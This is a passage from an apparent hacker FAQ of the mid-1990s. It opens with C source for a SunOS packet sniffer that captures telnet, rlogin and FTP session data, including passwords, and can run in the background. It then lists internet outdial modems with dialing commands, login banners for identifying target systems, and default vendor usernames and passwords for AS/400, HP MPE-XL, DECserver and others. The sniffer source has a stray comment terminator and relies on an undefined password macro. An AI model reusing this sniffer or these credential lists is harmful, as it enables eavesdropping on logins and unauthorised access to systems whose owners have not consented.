  944. #define MIN(a,b) (((a)<(b))?(a):(b))
  945.  
  946. /* add an item */
  947. #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  948.   register struct CREC *CLtmp = \
  949.         (struct CREC *)malloc(sizeof(struct CREC)); \
  950.   time( &(CLtmp->Time) ); \
  951.   CLtmp->SRCip.s_addr = SIP.s_addr; \
  952.   CLtmp->DSTip.s_addr = DIP.s_addr; \
  953.   CLtmp->SRCport = SPORT; \
  954.   CLtmp->DSTport = DPORT; \
  955.   CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  956.   bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  957.   CLtmp->PKcnt = 1; \
  958.   CLtmp->Next = CLroot; \
  959.   CLtmp->Last = NULL; \
  960.   CLroot = CLtmp; \
  961. }
  962.  
  963. register struct CREC *GET_NODE(Sip,SP,Dip,DP)
  964. register struct in_addr Sip,Dip;
  965. register u_int SP,DP;
  966. { register struct CREC *CLr = CLroot;
  967.  
  968.   while(CLr != NULL) {
  969.     if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
  970.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  971.             break;
  972.     CLr = CLr->Next;
  973.   }
  974.   return(CLr);
  975. }
  976.  
  977. #define ADDDATA_NODE(CL,DATA,LEN) { \
  978.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  979.  CL->Length += LEN; \
  980. }
  981.  
  982. #define PR_DATA(dp,ln) {    \
  983.   register u_char lastc=0; \
  984.   while(ln-- >0) { \
  985.      if(*dp < 32) {  \
  986.         switch(*dp) { \
  987.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  988.                         break; \
  989.             case '\r': \
  990.             case '\n': fprintf(LOG,"\n     : "); \
  991.                         break; \
  992.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  993.                         break; \
  994.         } \
  995.      } else { \
  996.         if(isprint(*dp)) fputc(*dp,LOG); \
  997.         else fprintf(LOG,"(%d)",*dp); \
  998.      } \
  999.      lastc = *dp++; \
  1000.   } \
  1001.   fflush(LOG); \
  1002. }
  1003.  
  1004. void END_NODE(CLe,d,dl,msg)
  1005. register struct CREC *CLe;
  1006. register u_char *d;
  1007. register int dl;
  1008. register char *msg;
  1009. {
  1010.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  1011.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  1012.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  1013.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  1014.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  1015.    fprintf(LOG," DATA: ");
  1016.     { register u_int i = CLe->Length;
  1017.       register u_char *p = CLe->Data;
  1018.       PR_DATA(p,i);
  1019.       PR_DATA(d,dl);
  1020.     }
  1021.  
  1022.    fprintf(LOG,"\n-- \n");
  1023.    fflush(LOG);
  1024.  
  1025.    if(CLe->Next != NULL)
  1026.     CLe->Next->Last = CLe->Last;
  1027.    if(CLe->Last != NULL)
  1028.     CLe->Last->Next = CLe->Next;
  1029.    else
  1030.     CLroot = CLe->Next;
  1031.    free(CLe);
  1032. }
  1033.  
  1034. /* 30 mins (x 60 seconds) */
  1035. #define IDLE_TIMEOUT 1800
  1036. #define IDLE_NODE() { \
  1037.   time_t tm; \
  1038.   time(&tm); \
  1039.   if(LastTIME<tm) { \
  1040.      register struct CREC *CLe,*CLt = CLroot; \
  1041.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  1042.      while(CLe=CLt) { \
  1043.        CLt=CLe->Next; \
  1044.        if(CLe->Time <tm) \
  1045.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  1046.      } \
  1047.   } \
  1048. }
  1049.  
  1050. void filter(cp, pktlen)
  1051. register char *cp;
  1052. register u_int pktlen;
  1053. {
  1054.  register struct ip     *ip;
  1055.  register struct tcphdr *tcph;
  1056.  
  1057.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  1058.  
  1059.    if(EtherType < 0x600) {
  1060.      EtherType = *(u_short *)(cp + SZETH + 6);
  1061.      cp+=8; pktlen-=8;
  1062.    }
  1063.  
  1064.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  1065.       return;
  1066.  }
  1067.  
  1068.     /* ugh, gotta do an alignment :-( */
  1069.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  1070.  
  1071.  ip = (struct ip *)Packet;
  1072.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  1073.     return;
  1074.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  1075.  
  1076.  if(!( (TCPD == IPPORT_TELNET) ||
  1077.        (TCPD == IPPORT_LOGINSERVER) ||
  1078.        (TCPD == IPPORT_FTP)
  1079.    )) return;
  1080.  
  1081.  { register struct CREC *CLm;
  1082.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  1083.    register u_char *p = (u_char *)Packet;
  1084.  
  1085.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  1086.  
  1087.  if(debug) {
  1088.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  1089.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  1090.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  1091.  }
  1092.  
  1093.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  1094.  
  1095.       CLm->PKcnt++;
  1096.  
  1097.       if(length>0)
  1098.         if( (CLm->Length + length) < MAXBUFLEN ) {
  1099.           ADDDATA_NODE( CLm, p,length);
  1100.         } else {
  1101.           END_NODE( CLm, p,length, "DATA LIMIT");
  1102.         }
  1103.  
  1104.       if(TCPFL(TH_FIN|TH_RST)) {
  1105.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  1106.       }
  1107.  
  1108.    } else {
  1109.  
  1110.       if(TCPFL(TH_SYN)) {
  1111.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  1112.       }
  1113.  
  1114.    }
  1115.  
  1116.    IDLE_NODE();
  1117.  
  1118.  }
  1119.  
  1120. }
  1121.  
  1122. /* signal handler
  1123.  */
  1124. void death()
  1125. { register struct CREC *CLe;
  1126.  
  1127.     while(CLe=CLroot)
  1128.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  1129.  
  1130.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  1131.     fflush(LOG);
  1132.     if(LOG != stdout)
  1133.         fclose(LOG);
  1134.     exit(1);
  1135. }
  1136.  
  1137. /* opens network interface, performs ioctls and reads from it,
  1138.  * passing data to filter function
  1139.  */
  1140. void do_it()
  1141. {
  1142.     int cc;
  1143.     char *buf;
  1144.     u_short sp_ts_len;
  1145.  
  1146.     if(!(buf=malloc(CHUNKSIZE)))
  1147.         Pexit(1,"Eth: malloc");
  1148.  
  1149. /* this /dev/nit initialization code pinched from etherfind */
  1150.   {
  1151.     struct strioctl si;
  1152.     struct ifreq    ifr;
  1153.     struct timeval  timeout;
  1154.     u_int  chunksize = CHUNKSIZE;
  1155.     u_long if_flags  = NI_PROMISC;
  1156.  
  1157.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  1158.         Pexit(1,"Eth: nit open");
  1159.  
  1160.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  1161.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  1162.  
  1163.     si.ic_timout = INFTIM;
  1164.  
  1165.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  1166.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  1167.  
  1168.     timeout.tv_sec = 1;
  1169.     timeout.tv_usec = 0;
  1170.     si.ic_cmd = NIOCSTIME;
  1171.     si.ic_len = sizeof(timeout);
  1172.     si.ic_dp  = (char *)&timeout;
  1173.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1174.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1175.  
  1176.     si.ic_cmd = NIOCSCHUNK;
  1177.     si.ic_len = sizeof(chunksize);
  1178.     si.ic_dp  = (char *)&chunksize;
  1179.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1180.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1181.  
  1182.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1183.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1184.     si.ic_cmd = NIOCBIND;
  1185.     si.ic_len = sizeof(ifr);
  1186.     si.ic_dp  = (char *)𝔦
  1187.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1188.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1189.  
  1190.     si.ic_cmd = NIOCSFLAGS;
  1191.     si.ic_len = sizeof(if_flags);
  1192.     si.ic_dp  = (char *)&if_flags;
  1193.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1194.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1195.  
  1196.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1197.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  1198.   }
  1199.  
  1200.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1201.         register char *bp = buf,
  1202.                       *bufstop = (buf + cc);
  1203.  
  1204.         while (bp < bufstop) {
  1205.             register char *cp = bp;
  1206.             register struct nit_bufhdr *hdrp;
  1207.  
  1208.             hdrp = (struct nit_bufhdr *)cp;
  1209.             cp += sizeof(struct nit_bufhdr);
  1210.             bp += hdrp->nhb_totlen;
  1211.             filter(cp, (u_long)hdrp->nhb_msglen);
  1212.         }
  1213.     }
  1214.     Pexit((-1),"Eth: read");
  1215. }
  1216.  /* Authorize your proogie,generate your own password and uncomment here */
  1217. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1218.  
  1219. void getauth()
  1220. { char *buf,*getpass(),*crypt();
  1221.   char pwd[21],prmpt[81];
  1222.  
  1223.     strcpy(pwd,AUTHPASSWD);
  1224.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1225.     buf=getpass(prmpt);
  1226.     if(strcmp(pwd,crypt(buf,pwd)))
  1227.         exit(1);
  1228. }
  1229.     */
  1230. void main(argc, argv)
  1231. int argc;
  1232. char **argv;
  1233. {
  1234.     char   cbuf[BUFSIZ];
  1235.     struct ifconf ifc;
  1236.     int    s,
  1237.            ac=1,
  1238.            backg=0;
  1239.  
  1240.     ProgName=argv[0];
  1241.  
  1242.  /*     getauth(); */
  1243.  
  1244.     LOG=NULL;
  1245.     device=NULL;
  1246.     while((ac<argc) && (argv[ac][0] == '-')) {
  1247.        register char ch = argv[ac++][1];
  1248.        switch(toupper(ch)) {
  1249.             case 'I': device=argv[ac++];
  1250.                       break;
  1251.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1252.                          Zexit(1,"Output file cant be opened\n");
  1253.                       break;
  1254.             case 'B': backg=1;
  1255.                       break;
  1256.             case 'D': debug=1;
  1257.                       break;
  1258.             default : fprintf(ERR,
  1259.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1260.                             ProgName);
  1261.                       exit(1);
  1262.        }
  1263.     }
  1264.  
  1265.     if(!device) {
  1266.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1267.             Pexit(1,"Eth: socket");
  1268.  
  1269.         ifc.ifc_len = sizeof(cbuf);
  1270.         ifc.ifc_buf = cbuf;
  1271.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1272.             Pexit(1,"Eth: ioctl");
  1273.  
  1274.         close(s);
  1275.         device = ifc.ifc_req->ifr_name;
  1276.     }
  1277.  
  1278.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1279.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1280.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1281.  
  1282.     if(!LOG)
  1283.         LOG=stdout;
  1284.  
  1285.     signal(SIGINT, death);
  1286.     signal(SIGTERM,death);
  1287.     signal(SIGKILL,death);
  1288.     signal(SIGQUIT,death);
  1289.  
  1290.     if(backg && debug) {
  1291.          fprintf(ERR,"[Cannot bg with debug on]\n");
  1292.          backg=0;
  1293.     }
  1294.  
  1295.     if(backg) {
  1296.         register int s;
  1297.  
  1298.         if((s=fork())>0) {
  1299.            fprintf(ERR,"[pid %d]\n",s);
  1300.            exit(0);
  1301.         } else if(s<0)
  1302.            Pexit(1,"fork");
  1303.  
  1304.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1305.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  1306.                 close(s);
  1307.         }
  1308.     }
  1309.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1310.     fflush(LOG);
  1311.  
  1312.     do_it();
  1313. }
  1314.  
  1315.  
  1316. 18. What is an Internet Outdial?
  1317.  
  1318. An Internet outdial is a modem connected to the Internet than you can
  1319. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1320. (Global OutDial) is capable of calling long distance.  Outdials are an
  1321. inexpensive method of calling long distance BBS's.
  1322.  
  1323.  
  1324. 19. What are some Internet Outdials?
  1325.  
  1326. This FAQ answer is excerpted from CoTNo #5:
  1327.  
  1328.             Internet Outdial List v3.0
  1329.              by Cavalier and DisordeR
  1330.  
  1331.  
  1332. Introduction
  1333. ------------
  1334. There are several lists of Internet outdials floating around the net these
  1335. days. The following is a compilation of other lists, as well as v2.0 by
  1336. DeadKat(CoTNo issue 2, article 4). Unlike other lists where the author
  1337. just ripped other people and released it, we have sat down and tested
  1338. each one of these. Some of them we have gotten "Connection Refused" or
  1339. it timed out while trying to connect...these have been labeled dead.
  1340.  
  1341.  
  1342.                Working Outdials
  1343.                ----------------
  1344.                 as of 12/29/94
  1345.  
  1346. NPA          IP Address                   Instructions
  1347. ---          ----------                   ------------
  1348. 215          isn.upenn.edu                modem
  1349.  
  1350. 217          dialout.cecer.army.mil       atdt x,xxxXXXXX
  1351.  
  1352. 218          modem.d.umn.edu              atdt9,xxxXXXX
  1353.  
  1354. 303          yuma.acns.colostate.edu 3020
  1355.  
  1356. 412          gate.cis.pitt.edu            tn3270, 
  1357.                       connect dialout.pitt.edu, 
  1358.                       atdtxxxXXXX
  1359.  
  1360. 413          dialout2400.smith.edu        Ctrl } gets ENTER NUMBER: xxxxxxx
  1361.  
  1362. 502          outdial.louisville.edu
  1363.  
  1364. 502          uknet.uky.edu                connect kecnet
  1365.                                           @ dial: "outdial2400 or out"
  1366.  
  1367. 602          acssdial.inre.asu.edu        atdt8,,,,,[x][yyy]xxxyyyy
  1368.  
  1369. 614          ns2400.acs.ohio-state.edu
  1370.  
  1371. 614          ns9600.acs.ohio-state.edu
  1372.  
  1373. 713          128.249.27.153               atdt x,xxxXXXX
  1374.  
  1375. 714          modem.nts.uci.edu            atdt[area]0[phone]
  1376.  
  1377. 804          ublan.virginia.edu           connect hayes, 9,,xxx-xxxx
  1378.  
  1379. 804          ublan2.acc.virginia.edu      connect telnet
  1380.                                           connect hayes
  1381.  
  1382.  
  1383.  
  1384.                            Need Password
  1385.                -------------
  1386.  
  1387. 206          rexair.cac.washington.edu    This is an unbroken password
  1388. 303          yuma.ACNS.ColoState.EDU      login: modem
  1389. 404          128.140.1.239                .modem8|CR
  1390. 415          annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
  1391. 514          cartier.CC.UMontreal.CA      externe,9+number
  1392. 703          wal-3000.cns.vt.edu          dial2400 -aa
  1393.  
  1394.  
  1395.                           Dead/No Connect
  1396.                           ---------------
  1397.  
  1398. 201          idsnet
  1399. 202          modem.aidt.edu
  1400. 204          dial.cc.umanitoba.ca
  1401. 204          umnet.cc.manitoba.ca         "dial12" or "dial24"
  1402. 206          dialout24.cac.washington.edu
  1403. 207          modem-o.caps.maine.edu
  1404. 212          B719-7e.NYU.EDU              dial3/dial12/dial24
  1405. 212          B719-7f.NYU.EDU              dial3/dial12/dial24
  1406. 212          DIALOUT-1.NYU.EDU            dial3/dial12/dial24
  1407. 212          FREE-138-229.NYU.EDU         dial3/dial12/dial24
  1408. 212          UP19-4b.NYU.EDU              dial3/dial12/dial24
  1409. 215          wiseowl.ocis.temple.edu      "atz" "atdt 9xxxyyyy"
  1410. 218          aa28.d.umn.edu               "cli" "rlogin modem"
  1411.                                           at "login:"  type "modem"
  1412. 218          modem.d.umn.edu              Hayes 9,XXX-XXXX
  1413. 301          dial9600.umd.edu
  1414. 305          alcat.library.nova.edu
  1415. 305          office.cis.ufl.edu
  1416. 307          modem.uwyo.edu               Hayes  0,XXX-XXXX
  1417. 313          35.1.1.6                     dial2400-aa or dial1200-aa
  1418.                                           or dialout
  1419. 402          dialin.creighton.edu
  1420. 402          modem.criegthon.edu
  1421. 404          broadband.cc.emory.edu       ".modem8" or ".dialout"
  1422. 408          dialout.scu.edu
  1423. 408          dialout1200.scu.edu
  1424. 408          dialout2400.scu.edu
  1425. 408          dialout9600.scu.edu
  1426. 413          dialout.smith.edu
  1427. 414          modems.uwp.edu
  1428. 416          annex132.berkely.edu         atdt 9,,,,, xxx-xxxx
  1429. 416          pacx.utcs.utoronto.ca        modem
  1430. 503          dialout.uvm.edu
  1431. 513          dialout24.afit.af.mil
  1432. 513          r596adi1.uc.edu
  1433. 514          pacx.CC.UMontreal.CA         externe#9 9xxx-xxxx
  1434. 517          engdial.cl.msu.edu
  1435. 602          dial9600.telcom.arizona.edu
  1436. 603          dialout1200.unh.edu
  1437. 604          dial24-nc00.net.ubc.ca
  1438. 604          dial24-nc01.net.ubc.ca
  1439. 604          dial96-np65.net.ubc.ca
  1440. 604          gmodem.capcollege.bc.ca
  1441. 604          hmodem.capcollege.bc.ca
  1442. 609          128.119.131.11X (X= 1 - 4)   Hayes
  1443. 609          129.119.131.11x  (x = 1 to 4)
  1444. 609          wright-modem-1.rutgers.edu
  1445. 609          wright-modem-2.rutgers.edu
  1446. 612          modem_out12e7.atk.com
  1447. 612          modem_out24n8.atk.com
  1448. 614          ns2400.ircc.ohio-state.edu   "dial"
  1449. 615          dca.utk.edu                  dial2400 D 99k #
  1450. 615          MATHSUN23.MATH.UTK.EDU       dial 2400  d  99Kxxxxxxx
  1451. 616          modem.calvin.edu
  1452. 617          128.52.30.3                  2400baud
  1453. 617          dialout.lcs.mit.edu
  1454. 617          dialout1.princeton.edu
  1455. 617          isdn3.Princeton.EDU
  1456. 617          jadwingymkip0.Princeton.EDU
  1457. 617          lord-stanley.Princeton.EDU
  1458. 617          mpanus.Princeton.EDU
  1459. 617          mrmodem.wellesley.edu
  1460. 617          old-dialout.Princeton.EDU
  1461. 617          stagger.Princeton.EDU
  1462. 617          sunshine-02.lcs.mit.edu
  1463. 617          waddle.Princeton.EDU
  1464. 619          128.54.30.1                  atdt [area][phone]
  1465. 619          dialin.ucsd.edu              "dialout"
  1466. 703          modem_pool.runet.edu
  1467. 703          wal-3000.cns.vt.edu
  1468. 713          128.249.27.154               "c modem96"  "atdt 9xxx-xxxx"
  1469.                                           or "Hayes"
  1470. 713          modem12.bcm.tmc.edu
  1471. 713          modem24.bcm.tmc.edu
  1472. 713          modem24.bcm.tmc.edu
  1473. 714          mdmsrv7.sdsu.edu             atdt 8xxx-xxxx
  1474. 714          modem24.nts.uci.edu
  1475. 714          pub-gopher.cwis.uci.edu
  1476. 801          dswitch.byu.edu              "C Modem"
  1477. 808          irmodem.ifa.hawaii.edu
  1478. 902          star.ccs.tuns.ca             "dialout"
  1479. 916          129.137.33.72
  1480. 916          cc-dnet.ucdavis.edu          connect hayes/dialout
  1481. 916          engr-dnet1.engr.ucdavis.edu  UCDNET <ret> C KEYCLUB <ret>
  1482. ???          128.119.131.11X              (1 - 4)
  1483. ???          128.200.142.5
  1484. ???          128.54.30.1                  nue, X to discontinue, ? for Help
  1485. ???          128.6.1.41
  1486. ???          128.6.1.42
  1487. ???          129.137.33.72
  1488. ???          129.180.1.57
  1489. ???          140.112.3.2                  ntu            <none>
  1490. ???          annexdial.rz.uni-duesseldorf.de
  1491. ???          dial96.ncl.ac.uk
  1492. ???          dialout.plk.af.mil
  1493. ???          ee21.ee.ncu.edu.tw           cs8005
  1494. ???          im.mgt.ncu.edu.tw            guest           <none>
  1495. ???          modem.cis.uflu.edu
  1496. ???          modem.ireq.hydro.qc.ca
  1497. ???          modems.csuohio.edu
  1498. ???          sparc20.ncu.edu.tw           u349633
  1499. ???          sun2cc.nccu.edu.tw           ?
  1500. ???          ts-modem.une.oz.au
  1501. ???          twncu865.ncu.edu.tw          guest           <none>
  1502. ???          vtnet1.cns.ut.edu            "CALL" or "call"
  1503.  
  1504.  
  1505. Conclusion
  1506. ----------
  1507. If you find any of the outdials to have gone dead, changed commands,
  1508. or require password, please let us know so we can keep this list as
  1509. accurate as possible. If you would like to add to the list, feel free
  1510. to mail us and it will be included in future versions of this list,
  1511. with your name beside it. Have fun...
  1512.  
  1513. [Editors note: Updates have been made to this document after
  1514.                the original publication]
  1515.  
  1516.  
  1517. 20. What is this system?
  1518.  
  1519.  
  1520. AIX
  1521. ~~~
  1522. IBM AIX Version 3 for RISC System/6000
  1523. (C) Copyrights by IBM and by others 1982, 1990.
  1524. login:
  1525.  
  1526. [You will know an AIX system because it is the only Unix system that]
  1527. [clears the screen and issues a login prompt near the bottom of the]
  1528. [screen]
  1529.  
  1530.  
  1531. AS/400
  1532. ~~~~~~
  1533. UserID?
  1534. Password?
  1535.  
  1536. Once in, type GO MAIN
  1537.  
  1538.  
  1539. CDC Cyber
  1540. ~~~~~~~~~
  1541. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1542. COPYRIGHT CONTROL DATA 1978, 1987.
  1543.  
  1544. 88/02/16. 02.36.53. N265100
  1545. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1546. FAMILY:
  1547.  
  1548. You would normally just hit return at the family prompt.  Next prompt is:
  1549.  
  1550. USER NAME:
  1551.  
  1552.  
  1553. CISCO Router
  1554. ~~~~~~~~~~~~
  1555.                              FIRST BANK OF TNO
  1556.                            95-866 TNO VirtualBank
  1557.                           REMOTE Router -  TN043R1
  1558.  
  1559.                                 Console Port
  1560.  
  1561.                                 SN - 00000866
  1562.  
  1563. TN043R1>
  1564.  
  1565.  
  1566. DECserver
  1567. ~~~~~~~~~
  1568. DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
  1569. DPS502-DS700
  1570.  
  1571. (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
  1572.  
  1573. Please type HELP if you need assistance
  1574.  
  1575. Enter username> TNO
  1576.  
  1577. Local>
  1578.  
  1579.  
  1580. Hewlett Packard MPE-XL
  1581. ~~~~~~~~~~~~~~~~~~~~~~
  1582. MPE XL:
  1583. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  1584. MPE XL:
  1585. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  1586. MPE XL:
  1587.  
  1588.  
  1589. GTN
  1590. ~~~
  1591. WELCOME TO CITIBANK. PLEASE SIGN ON.
  1592. XXXXXXXX
  1593.  
  1594. @
  1595. PASSWORD =
  1596.  
  1597. @
  1598.  
  1599. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1600.  
  1601. PLEASE ENTER YOUR ID:-1->
  1602. PLEASE ENTER YOUR PASSWORD:-2->
  1603.  
  1604. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  1605.   XXX.XXX
  1606.  PLEASE SELECT SERVICE REQUIRED.-3->
  1607.  
  1608.  
  1609. Lantronix Terminal Server
  1610. ~~~~~~~~~~~~~~~~~~~~~~~~~
  1611. Lantronix ETS16 Version V3.1/1(940623)
  1612.  
  1613. Type HELP at the 'Local_15> ' prompt for assistance.
  1614.  
  1615. Login password>
  1616.  
  1617.  
  1618. Meridian Mail (Northern Telecom Phone/Voice Mail System)
  1619. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1620.                             MMM       MMMERIDIAN
  1621.                            MMMMM     MMMMM
  1622.                          MMMMMM   MMMMMM
  1623.                         MMM  MMMMM  MMM     MMMMM     MMMMM
  1624.                       MMM   MMM   MMM     MMMMMM   MMMMMM
  1625.                      MMM         MMM     MMM MMM MMM MMM
  1626.                     MMM         MMM     MMM  MMMMM  MMM
  1627.                    MMM         MMM     MMM   MMM   MMM
  1628.                   MMM         MMM     MMM         MMM
  1629.                  MMM         MMM     MMM         MMM
  1630.                 MMM         MMM     MMM         MMM
  1631.                MMM         MMM     MMM         MMM
  1632.               MMM         MMM     MMM         MMM
  1633.  
  1634.                                           Copyright (c) Northern Telecom, 1991
  1635.  
  1636.  
  1637. Novell ONLAN
  1638. ~~~~~~~~~~~~
  1639. N
  1640.  
  1641. [To access the systems it is best to own a copy of ONLAN/PC]
  1642.  
  1643.  
  1644. PC-Anywhere
  1645. ~~~~~~~~~~~
  1646. P
  1647.  
  1648. [To access the systems it is best to own a copy of PCAnywhere Remote]
  1649.  
  1650.  
  1651. PRIMOS
  1652. ~~~~~~
  1653. PRIMENET 19.2.7F PPOA1
  1654.  
  1655. <any text>
  1656.  
  1657. ER!
  1658.  
  1659. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1660.  
  1661. CONNECT
  1662. Primenet V 2.3  (system)
  1663. LOGIN           (you)
  1664. User id?        (system)
  1665. SAPB5           (you)
  1666. Password?       (system)
  1667. DROWSAP         (you)
  1668. OK,             (system)
  1669.  
  1670.  
  1671. ROLM CBX II
  1672. ~~~~~~~~~~~
  1673. ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568
  1674. BIND DATE:  7/APR/93
  1675. COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.
  1676. ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
  1677. YOU HAVE ENTERED CPU 1
  1678. 12:38:47 ON WEDNESDAY 2/15/1995
  1679.  
  1680. USERNAME: op
  1681.  
  1682. PASSWORD:
  1683.  
  1684.  INVALID USERNAME-PASSWORD PAIR
  1685.  
  1686.  
  1687. ROLM-OSL
  1688. ~~~~~~~~
  1689. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  1690. RELEASE 8003
  1691. OSL, PLEASE.
  1692. ?
  1693.  
  1694.  
  1695. System75
  1696. ~~~~~~~~
  1697. Login: root
  1698. INCORRECT LOGIN
  1699.  
  1700. Login: browse
  1701. Password:
  1702.  
  1703. Software Version: G3s.b16.2.2
  1704.  
  1705. Terminal Type (513, 4410, 4425): [513]
  1706.  
  1707.  
  1708. Tops-10
  1709. ~~~~~~~
  1710. NIH Timesharing
  1711.  
  1712. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  1713. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  1714. Please LOGIN
  1715. .
  1716.  
  1717.  
  1718. VM/370
  1719. ~~~~~~
  1720. VM/370
  1721. !
  1722.  
  1723.  
  1724. VM/ESA
  1725. ~~~~~~
  1726. VM/ESA ONLINE
  1727.  
  1728.                                           TBVM2 VM/ESA Rel 1.1     PUT 9200
  1729.  
  1730. Fill in your USERID and PASSWORD and press ENTER
  1731. (Your password will not appear when you type it)
  1732. USERID   ===>
  1733. PASSWORD ===>
  1734.  
  1735. COMMAND  ===>
  1736.  
  1737.  
  1738. Xylogics Annex Communications Server
  1739. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1740. Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
  1741.  
  1742. Checking authorization, Please wait...
  1743. Annex username: TNO
  1744. Annex password:
  1745.  
  1746. Permission granted
  1747. annex:
  1748.  
  1749.  
  1750. 21. What are the default accounts for XXX?
  1751.  
  1752. AIX
  1753. ~~~
  1754. guest           guest
  1755.  
  1756.  
  1757. AS/400
  1758. ~~~~~~
  1759. qsecofr         qsecofr         /* master security officer */
  1760. qsysopr         qsysopr         /* system operator         */
  1761. qpgmr           qpgmr           /* default programmer      */
  1762.  
  1763. also
  1764.  
  1765. ibm/password
  1766. ibm/2222
  1767. ibm/service
  1768. qsecofr/1111111
  1769. qsecofr/2222222
  1770. qsvr/qsvr
  1771. secofr/secofr
  1772.  
  1773.  
  1774. DECserver
  1775. ~~~~~~~~~
  1776. ACCESS
  1777. SYSTEM
  1778.  
  1779.  
  1780. Dynix (The library software, not the UnixOS)
  1781. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1782. (Type 'later' to exit to the login prompt)
  1783. setup           <no password>
  1784. library         <no password>
  1785. circ            <9 digit number>
  1786.  
  1787.  
  1788. Hewlett Packard MPE-XL
  1789. ~~~~~~~~~~~~~~~~~~~~~~
  1790. HELLO           MANAGER.SYS
  1791. HELLO           MGR.SYS
  1792. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  1793. HELLO           OP.OPERATOR
  1794. MGR             CAROLIAN
  1795. MGR             CCC
  1796. MGR             CNAS
  1797. MGR             CONV
  1798. MGR             COGNOS
  1799. OPERATOR        COGNOS
  1800. MANAGER         COGNOS
